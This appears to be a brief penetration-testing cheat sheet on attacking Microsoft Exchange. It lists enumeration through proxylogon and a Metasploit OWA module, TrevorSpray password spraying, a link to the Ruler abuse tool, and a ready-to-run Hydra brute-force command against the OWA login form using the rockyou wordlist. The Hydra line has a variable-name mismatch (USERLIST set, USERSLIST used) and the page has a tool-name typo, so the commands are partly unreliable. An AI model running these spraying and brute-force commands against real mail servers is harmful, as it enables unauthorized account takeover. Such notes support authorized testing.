Exchange

Enum: 

proxylogon - extract from autodiscover
auxiliary/scanner/http/owa_login - may extract domain name

TrevorSpray: 

trevorspray --recon owa - test users
trevorspay test users and passwords

Hydra: 

USERLIST=users.txt
PASSLIST=/usr/share/wordlist/rockyou.txt
hydra -V -L "${USERSLIST}" -e s -P "${PASSLIST}" "${DOMAIN}" https-post-form "/owa/auth.owa:flags=4&destination=https\://${DOMAIN}/owa/&forcedownlevel=0&username=^USER^&password=^PASS^&isUtf8=1:F=The user name or password"
LogoGitHub - sensepost/ruler: A tool to abuse Exchange servicesGitHub
PreviousgMSANextGroup Exploitation

Last updated